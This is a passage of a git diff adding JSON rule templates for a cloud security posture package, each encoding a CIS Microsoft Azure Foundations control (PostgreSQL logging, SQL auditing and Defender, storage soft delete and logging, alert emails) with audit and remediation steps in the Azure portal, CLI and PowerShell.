DB instance.\n\n```\naz sql db tde set --resource-group --server --database --status Enabled\n```\n\n**From PowerShell**\n\nUse the below command to enable `Transparent data encryption` for SQL DB instance.\n\n```\nSet-AzSqlDatabaseTransparentDataEncryption -ResourceGroupName -ServerName -DatabaseName -State 'Enabled'\n```\n\n**Note:**\n\n- TDE cannot be used to encrypt the logical master database in SQL Database.\nThe master database contains objects that are needed to perform the TDE operations on the user databases.\n\n- Azure Portal does not show master databases per SQL server.\nHowever, CLI/API responses will show master databases.", + "section": "SQL Server - Auditing", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.1.5", + "SQL Server - Auditing" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.1.5", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_1_5" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/9272d2b5-4e25-5658-8a6c-d917f60134ec.json b/packages/cloud_security_posture/kibana/csp_rule_template/9272d2b5-4e25-5658-8a6c-d917f60134ec.json new file mode 100644 index 00000000000..3b362fca7f6 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/9272d2b5-4e25-5658-8a6c-d917f60134ec.json @@ -0,0 +1,38 @@ +{ + "id": "9272d2b5-4e25-5658-8a6c-d917f60134ec", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Enabling this setting will enable a log of all disconnections. If this is enabled for a high traffic server, the log may grow exponentially.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/rest/api/postgresql/singleserver/configurations/list-by-server\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources\n4. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name", + "id": "9272d2b5-4e25-5658-8a6c-d917f60134ec", + "name": "Ensure server parameter 'log_disconnections' is set to 'ON' for PostgreSQL Database Server", + "profile_applicability": "* Level 1", + "description": "Enable `log_disconnections` on `PostgreSQL Servers`.", + "rationale": "Enabling `log_disconnections` helps PostgreSQL Database to `Logs end of a session`, including duration, which in turn generates query and error logs.\nQuery and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Go to `Azure Database` for `PostgreSQL servers`\n3. For each database, click on `Server parameters`\n4. Search for `log_disconnections`.\n5. Ensure that value is set to `ON`.\n\n**From Azure CLI**\n\nEnsure `log_disconnections` value is set to `ON`\n```\naz postgres server configuration show --resource-group --server-name --name log_disconnections\n```\n\n**From PowerShell**\n\nEnsure `log_disconnections` value is set to `ON`\n\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_disconnections\n```", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Go to `Azure Database` for `PostgreSQL servers`\n3. For each database, click on `Server parameters`\n4. Search for `log_disconnections`.\n5. Click `ON` and save.\n\n**From Azure CLI**\n\nUse the below command to update `log_disconnections` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name log_disconnections --value on\n```\n\n**From PowerShell**\n\nUse the below command to update `log_disconnections` configuration.\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_disconnections -Value on\n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.4", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.4", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_4" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/97504079-0d62-5d0a-9939-17b57b444547.json b/packages/cloud_security_posture/kibana/csp_rule_template/97504079-0d62-5d0a-9939-17b57b444547.json new file mode 100644 index 00000000000..50f13ef726b --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/97504079-0d62-5d0a-9939-17b57b444547.json @@ -0,0 +1,38 @@ +{ + "id": "97504079-0d62-5d0a-9939-17b57b444547", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-provide-security-contact-details\n2. https://docs.microsoft.com/en-us/rest/api/securitycenter/securitycontacts/list\n3. https://docs.microsoft.com/en-us/rest/api/securitycenter/security-contacts\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-incident-response#ir-2-preparation--setup-incident-notification", + "id": "97504079-0d62-5d0a-9939-17b57b444547", + "name": "Ensure That 'Notify about alerts with the following severity' is Set to 'High'", + "profile_applicability": "* Level 1", + "description": "Enables emailing security alerts to the subscription owner or other designated security contact.", + "rationale": "Enabling security alert emails ensures that security alert emails are received from Microsoft.\nThis ensures that the right people are aware of any potential security issues and are able to mitigate the risk.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Ensure that the `Notify about alerts with the following severity (or higher):` setting is checked and set to `High`\n\n**From Azure CLI**\n\nEnsure the output of below command is set to `true`, enter your Subscription ID at the $0 between /subscriptions/<$0>/providers.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts?api-version=2020-01-01-preview' | jq '.|.[] | select(.name==\"default\")'|jq '.properties.alertNotifications'\n```", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Under `Notification types`, check the check box next to `Notify about alerts with the following severity (or higher):` and select `High` from the drop down menu\n7. Click `Save`\n\n**From Azure CLI**\n\nUse the below command to set `Send email notification for high severity alerts` to `On`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X PUT -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/<$0>/providers/Microsoft.Security/securityContacts/default1?api-version=2017-08-01-preview -d@\"input.json\"'\n```\nWhere `input.json` contains the data below, replacing `validEmailAddress` with a single email address or multiple comma-separated email addresses:\n```\n {\n \"id\": \"/subscriptions//providers/Microsoft.Security/securityContacts/default1\",\n \"name\": \"default1\",\n \"type\": \"Microsoft.Security/securityContacts\",\n \"properties\": {\n \"email\": \"\",\n \"alertNotifications\": \"On\",\n \"alertsToAdmins\": \"On\"\n }\n }\n```", + "section": "Microsoft Defender for Cloud", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 2.1.20", + "Microsoft Defender for Cloud" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "2.1.20", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_2_1_20" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/9ce2276b-db96-5aad-9329-08ce874c5db6.json b/packages/cloud_security_posture/kibana/csp_rule_template/9ce2276b-db96-5aad-9329-08ce874c5db6.json new file mode 100644 index 00000000000..fc326cb7e90 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/9ce2276b-db96-5aad-9329-08ce874c5db6.json @@ -0,0 +1,38 @@ +{ + "id": "9ce2276b-db96-5aad-9329-08ce874c5db6", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/rest/api/postgresql/singleserver/configurations/list-by-server\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources\n4. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name", + "id": "9ce2276b-db96-5aad-9329-08ce874c5db6", + "name": "Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server", + "profile_applicability": "* Level 1", + "description": "Enable `connection_throttling` on `PostgreSQL Servers`.", + "rationale": "Enabling `connection_throttling` helps the PostgreSQL Database to `Set the verbosity of logged messages`.\nThis in turn generates query and error logs with respect to concurrent connections that could lead to a successful Denial of Service (DoS) attack by exhausting connection resources.\nA system can also fail or be degraded by an overload of legitimate users.\nQuery and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.", + "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `connection_throttling`.\n5. Ensure that value is set to `ON`.\n\n**From Azure CLI**\n\nEnsure `connection_throttling` value is set to `ON`\n```\naz postgres server configuration show --resource-group --server-name --name connection_throttling\n```\n\n**From PowerShell**\n\nEnsure `connection_throttling` value is set to `ON`\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name connection_throttling\n```", + "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `connection_throttling`.\n5. Click `ON` and save.\n\n**From Azure CLI**\n\nUse the below command to update `connection_throttling` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name connection_throttling --value on\n```\n\n**From PowerShell**\n\nUse the below command to update `connection_throttling` configuration.\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name connection_throttling -Value on\n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.5", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.5", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_5" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/9fb9a46f-de59-580b-938e-829090bd3975.json b/packages/cloud_security_posture/kibana/csp_rule_template/9fb9a46f-de59-580b-938e-829090bd3975.json new file mode 100644 index 00000000000..89209253988 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/9fb9a46f-de59-580b-938e-829090bd3975.json @@ -0,0 +1,38 @@ +{ + "id": "9fb9a46f-de59-580b-938e-829090bd3975", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Microsoft Defender for SQL is a paid feature and will incur additional cost for each SQL server.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/azure-sql/database/azure-defender-for-sql?view=azuresql\n2. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/get-azurermsqlserverthreatdetectionpolicy?view=azurermps-6.13.0&viewFallbackFrom=azurermps-5.2.0\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-2-monitor-anomalies-and-threats-targeting-sensitive-data", + "id": "9fb9a46f-de59-580b-938e-829090bd3975", + "name": "Ensure that Microsoft Defender for SQL is set to 'On' for critical SQL Servers", + "profile_applicability": "* Level 2", + "description": "Enable \"Microsoft Defender for SQL\" on critical SQL Servers.", + "rationale": "Microsoft Defender for SQL is a unified package for advanced SQL security capabilities.\nMicrosoft Defender is available for Azure SQL Database, Azure SQL Managed Instance, and Azure Synapse Analytics.\nIt includes functionality for discovering and classifying sensitive data, surfacing and mitigating potential database vulnerabilities, and detecting anomalous activities that could indicate a threat to your database.\nIt provides a single go-to location for enabling and managing these capabilities.", + "audit": "**From Azure Portal**\n\n1. Go to `SQL servers`\n\nFor each production SQL server instance:\n\n2. Click `Microsoft Defender for Cloud`\n3. Ensure that `Enablement Status` is `Enabled`\n\n**From PowerShell**\n\nGet the list of all SQL Servers\n```\nGet-AzSqlServer\n```\nFor each Server\n```\nGet-AzSqlServerAdvancedThreatProtectionSetting -ResourceGroupName -ServerName \n```\nEnsure that `ThreatDetectionState` is set to `Enabled`.", + "remediation": "**From Azure Portal**\n\n1. Go to `SQL servers`\n\nFor each production SQL server instance:\n\n2. Click `Microsoft Defender for Cloud`\n3. Click `Enable Microsoft Defender for SQL`\n\n**From PowerShell**\n\nEnable `Advanced Data Security` for a SQL Server: \n```\nSet-AzSqlServerThreatDetectionPolicy -ResourceGroupName -ServerName -EmailAdmins $True\n```\n\nNote:\n- Enabling 'Microsoft Defender for SQL' from the Azure portal enables `Threat Detection`\n- Using Powershell command `Set-AzSqlServerThreatDetectionPolicy` enables `Microsoft Defender for SQL` for a SQL server", + "section": "SQL Server - Microsoft Defender for SQL", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.2.1", + "SQL Server - Microsoft Defender for SQL" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.2.1", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_2_1" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/a22a5431-1471-534c-8e7c-1e16fe0a857c.json b/packages/cloud_security_posture/kibana/csp_rule_template/a22a5431-1471-534c-8e7c-1e16fe0a857c.json new file mode 100644 index 00000000000..6a4d43c718f --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/a22a5431-1471-534c-8e7c-1e16fe0a857c.json @@ -0,0 +1,38 @@ +{ + "id": "a22a5431-1471-534c-8e7c-1e16fe0a857c", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Additional storage costs may be incurred as snapshots are retained.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-soft-delete\n2. https://docs.microsoft.com/en-us/azure/storage/blobs/soft-delete-container-overview\n3. https://docs.microsoft.com/en-us/azure/storage/blobs/soft-delete-container-enable?tabs=azure-portal", + "id": "a22a5431-1471-534c-8e7c-1e16fe0a857c", + "name": "Ensure Soft Delete is Enabled for Azure Containers and Blob Storage", + "profile_applicability": "* Level 1", + "description": "The Azure Storage blobs contain data like ePHI or Financial, which can be secret or personal.\nData that is erroneously modified or deleted by an application or other storage account user will cause data loss or unavailability.\n\nIt is recommended that both Azure Containers with attached Blob Storage and standalone containers with Blob Storage be made recoverable by enabling the **soft delete** configuration.\nThis is to save and recover data when blobs or blob snapshots are deleted.", + "rationale": "Containers and Blob Storage data can be incorrectly deleted.\nAn attacker/malicious user may do this deliberately in order to cause disruption.\nDeleting an Azure Storage blob causes immediate data loss.\nEnabling this configuration for Azure storage ensures that even if blobs/data were deleted from the storage account, Blobs/data objects are recoverable for a particular time which is set in the \"Retention policies,\" ranging from 7 days to 365 days.", + "audit": "**From Azure Portal:**\n\n1. From the Azure home page, open the hamburger menu in the top left or click on the arrow pointing right with 'More services' underneath.\n2. Select Storage.\n3. Select Storage Accounts.\n4. For each Storage Account, navigate to Data protection in the left scroll column.\n5. Ensure that soft delete is checked for both blobs and containers. Also check if the retention period is a sufficient length for your organization. \n\n**From Azure CLI**\n\n**Blob Storage**\nEnsure that the output of the below command contains enabled status as true and days is not empty or null\n\n```\naz storage blob service-properties delete-policy show --account-name --account-key \n```\n\n**Azure Containers**\nMake certain that the --enable-container-delete-retention is 'true'.\n```\naz storage account blob-service-properties show\n --account-name \n --account-key \n --resource-group \n```", + "remediation": "**From Azure Portal**\n1. From the Azure home page, open the hamburger menu in the top left or click on the arrow pointing right with 'More services' underneath.\n2. Select Storage.\n3. Select Storage Accounts.\n4. For each Storage Account, navigate to Data protection in the left scroll column.\n5. Check soft delete for both blobs and containers. Set the retention period to a sufficient length for your organization. \n\n**From Azure CLI**\n\nUpdate blob storage retention days in below command\n```\naz storage blob service-properties delete-policy update --days-retained --account-name --account-key --enable true\n```\nUpdate container retention with the below command\n```\naz storage account blob-service-properties update\n --enable-container-delete-retention true\n --container-delete-retention-days \n --account-name \n --resource-group \n --account-key \n```", + "section": "Storage Accounts", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 3.11", + "Storage Accounts" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "3.11", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_3_11" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/b287617d-7623-5d72-923d-e79b1301e06c.json b/packages/cloud_security_posture/kibana/csp_rule_template/b287617d-7623-5d72-923d-e79b1301e06c.json new file mode 100644 index 00000000000..d8116b5a148 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/b287617d-7623-5d72-923d-e79b1301e06c.json @@ -0,0 +1,38 @@ +{ + "id": "b287617d-7623-5d72-923d-e79b1301e06c", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-provide-security-contact-details\n2. https://docs.microsoft.com/en-us/rest/api/securitycenter/securitycontacts/list\n3. https://docs.microsoft.com/en-us/rest/api/securitycenter/security-contacts\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-incident-response#ir-2-preparation--setup-incident-notification", + "id": "b287617d-7623-5d72-923d-e79b1301e06c", + "name": "Ensure That 'All users with the following roles' is set to 'Owner'", + "profile_applicability": "* Level 1", + "description": "Enable security alert emails to subscription owners.", + "rationale": "Enabling security alert emails to subscription owners ensures that they receive security alert emails from Microsoft.\nThis ensures that they are aware of any potential security issues and can mitigate the risk in a timely fashion.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Then `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Ensure that `All users with the following roles` is set to `Owner`\n\n**From Azure CLI**\n\nEnsure the output of below command is set to `true`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts?api-version=2020-01-01-preview' | jq '.|.value[] | select(.name==\"default\")'|jq '.properties.notificationsByRole'\n```", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. In the drop down of the `All users with the following roles` field select `Owner`\n7. Click `Save`\n\n**From Azure CLI**\n\nUse the below command to set `Send email also to subscription owners` to `On`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X PUT -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts/default1?api-version=2017-08-01-preview -d@\"input.json\"'\n```\nWhere `input.json` contains the data below, replacing `validEmailAddress` with a single email address or multiple comma-separated email addresses:\n```\n {\n \"id\": \"/subscriptions//providers/Microsoft.Security/securityContacts/default1\",\n \"name\": \"default1\",\n \"type\": \"Microsoft.Security/securityContacts\",\n \"properties\": {\n \"email\": \"\",\n \"alertNotifications\": \"On\",\n \"alertsToAdmins\": \"On\",\n \"notificationsByRole\": \"Owner\"\n }\n }\n```", + "section": "Microsoft Defender for Cloud", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 2.1.18", + "Microsoft Defender for Cloud" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "2.1.18", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_2_1_18" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/b794635d-a338-5b4e-bfa0-75257e854c6a.json b/packages/cloud_security_posture/kibana/csp_rule_template/b794635d-a338-5b4e-bfa0-75257e854c6a.json new file mode 100644 index 00000000000..7dac1bc50f5 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/b794635d-a338-5b4e-bfa0-75257e854c6a.json @@ -0,0 +1,38 @@ +{ + "id": "b794635d-a338-5b4e-bfa0-75257e854c6a", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Being a level 2, enabling this setting can have a high impact on the cost of data storage used for logging more data per each request. Do not enable this without determining your need for this level of logging or forget to check in on data usage and projected cost.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/rest/api/storageservices/about-storage-analytics-logging\n2. https://docs.microsoft.com/en-us/cli/azure/storage/logging?view=azure-cli-latest\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation", + "id": "b794635d-a338-5b4e-bfa0-75257e854c6a", + "name": "Ensure Storage logging is Enabled for Blob Service for 'Read', 'Write', and 'Delete' requests", + "profile_applicability": "* Level 2", + "description": "The Storage Blob service provides scalable, cost-efficient object storage in the cloud.\nStorage Logging happens server-side and allows details for both successful and failed requests to be recorded in the storage account.\nThese logs allow users to see the details of read, write, and delete operations against the blobs.\nStorage Logging log entries contain the following information about individual requests: timing information such as start time, end-to-end latency, and server latency; authentication details; concurrency information; and the sizes of the request and response messages.", + "rationale": "Storage Analytics logs contain detailed information about successful and failed requests to a storage service.\nThis information can be used to monitor each individual request to a storage service for increased security or diagnostics.\nRequests are logged on a best-effort basis.\n\nStorage Analytics logging is not enabled by default for your storage account.", + "audit": "**From Azure Portal**\n\n1. From the default portal page select `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings` under the `Monitoring` section in the left column.\n4. Select the 'blob' tab indented below the storage account. Then select the diagnostic setting listed.\n5. Ensure `StorageRead`, `StorageWrite`, and `StorageDelete` options are selected under the `Logging section` and that they are sent to the correct destination.\n\n**From Azure CLI**\n\nEnsure the below command's output contains properties delete, read and write set to true.\n\n```\naz storage logging show --services b --account-name \n```", + "remediation": "**From Azure Portal**\n\n1. From the default portal page select `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings` under the `Monitoring` section in the left column.\n4. Select the 'blob' tab indented below the storage account. \n5. Click '+ Add diagnostic setting'.\n6. Select `StorageRead`, `StorageWrite` and `StorageDelete` options under the `Logging` section to enable Storage Logging for Blob service.\n7. Select a destination for your logs to be sent to.\n\n**From Azure CLI**\n\nUse the below command to enable the Storage Logging for Blob service.\n\n```\naz storage logging update --account-name --account-key --services b --log rwd --retention 90\n```", + "section": "Storage Accounts", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 3.13", + "Storage Accounts" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "3.13", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_3_13" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/e570dc22-4f5d-51db-a193-983cb7d20afe.json b/packages/cloud_security_posture/kibana/csp_rule_template/e570dc22-4f5d-51db-a193-983cb7d20afe.json new file mode 100644 index 00000000000..f5cd185f5c0 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/e570dc22-4f5d-51db-a193-983cb7d20afe.json @@ -0,0 +1,38 @@ +{ + "id": "e570dc22-4f5d-51db-a193-983cb7d20afe", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-enable-auditing-on-sql-servers\n2. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/get-azurermsqlserverauditing?view=azurermps-5.2.0\n3. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/set-azurermsqlserverauditingpolicy?view=azurermps-5.2.0\n4. https://docs.microsoft.com/en-us/azure/sql-database/sql-database-auditing\n5. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation", + "id": "e570dc22-4f5d-51db-a193-983cb7d20afe", + "name": "Ensure that 'Auditing' is set to 'On'", + "profile_applicability": "* Level 1", + "description": "Enable auditing on SQL Servers.", + "rationale": "The Azure platform allows a SQL server to be created as a service.\nEnabling auditing at the server level ensures that all existing and newly created databases on the SQL server instance are audited.\n\nAuditing policy applied on the SQL database does not override auditing policy and settings applied on the particular SQL server where the database is hosted.\n\nAuditing tracks database events and writes them to an audit log in the Azure storage account.\nIt also helps to maintain regulatory compliance, understand database activity, and gain insight into discrepancies and anomalies that could indicate business concerns or suspected security violations.", + "audit": "**From Azure Portal**\n\n1. Go to `SQL servers`\n2. For each server instance\n3. Click on `Auditing`\n4. Ensure that `Enable Azure SQL Auditing` is set to `On`\n\n**From PowerShell**\n\nGet the list of all SQL Servers\n\n```\nGet-AzSqlServer\n```\n\nFor each Server\n\n```\nGet-AzSqlServerAudit -ResourceGroupName -ServerName \n```\n\nEnsure that `BlobStorageTargetState`, `EventHubTargetState`, or `LogAnalyticsTargetState` is set to `Enabled`.", + "remediation": "**From Azure Portal**\n\n1. Go to `SQL servers`\n2. Select the SQL server instance\n3. Under `Security`, click `Auditing`\n4. Click the toggle next to `Enable Azure SQL Auditing`\n5. Select an Audit log destination\n6. Click `Save`\n\n**From PowerShell**\n\nGet the list of all SQL Servers\n\n```\nGet-AzSqlServer\n```\n\nFor each Server, enable auditing and set the retention for at least 90 days.\n\n**Log Analytics Example**\n```\nSet-AzSqlServerAudit -ResourceGroupName -ServerName -RetentionInDays -LogAnalyticsTargetState Enabled -WorkspaceResourceId \"/subscriptions//resourceGroups/insights-integration/providers/Microsoft.OperationalInsights/workspaces/\n```\n\n**Event Hub Example**\n\n```\nSet-AzSqlServerAudit -ResourceGroupName \"\" -ServerName \"\" -EventHubTargetState Enabled -EventHubName \n \"\" -EventHubAuthorizationRuleResourceId \"\"\n```\n\n**Blob Storage Example***\n\n```\nSet-AzSqlServerAudit -ResourceGroupName \"\" -ServerName \"\" -BlobStorageTargetState Enabled \n -StorageAccountResourceId \"/subscriptions//resourceGroups//providers/Microsoft.Stora\n ge/storageAccounts/\"\n```", + "section": "SQL Server - Auditing", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.1.1", + "SQL Server - Auditing" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.1.1", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_1_1" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/eb9e71ae-113b-5631-9e5c-b7fdc0b0666e.json b/packages/cloud_security_posture/kibana/csp_rule_template/eb9e71ae-113b-5631-9e5c-b7fdc0b0666e.json new file mode 100644 index 00000000000..cc48ee426f9 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/eb9e71ae-113b-5631-9e5c-b7fdc0b0666e.json @@ -0,0 +1,38 @@ +{ + "id": "eb9e71ae-113b-5631-9e5c-b7fdc0b0666e", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/postgresql/concepts-firewall-rules\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-manage-firewall-using-cli\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-network-security#ns-1-establish-network-segmentation-boundaries\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-network-security#ns-6-deploy-web-application-firewall", + "id": "eb9e71ae-113b-5631-9e5c-b7fdc0b0666e", + "name": "Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled", + "profile_applicability": "* Level 1", + "description": "Disable access from Azure services to PostgreSQL Database Server.", + "rationale": "If access from Azure services is enabled, the server's firewall will accept connections from all Azure resources, including resources not in your subscription.\nThis is usually not a desired configuration.\nInstead, set up firewall rules to allow access from specific 